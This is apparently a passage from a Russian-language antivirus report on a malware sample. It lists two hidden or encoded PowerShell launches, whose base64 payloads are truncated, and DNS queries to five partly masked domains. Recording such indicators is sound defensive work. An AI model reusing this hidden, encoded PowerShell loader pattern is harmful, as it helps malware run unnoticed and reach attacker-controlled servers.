Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABBAHkAegB3AGIAdwBjAGgAbQB3AHoAZABhAD0AJwBKAGgAZQB5AHIAbABpAG0AZgBkAGMAdQBrACcAOwAkAFcAawBnAGsAbwB1AH...
- DNS ASK ti####ssmasti.com
- DNS ASK mi##n.xyz
- DNS ASK st###ella.xyz
- DNS ASK mo##mk.com
- DNS ASK le##bin.xyz
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABBAHkAegB3AGIAdwBjAGgAbQB3AHoAZABhAD0AJwBKAGgAZQB5AHIAbABpAG0AZgBkAGMAdQBrACcAOwAkAFcAawBnAGsAbwB1AH...' (со скрытым окном)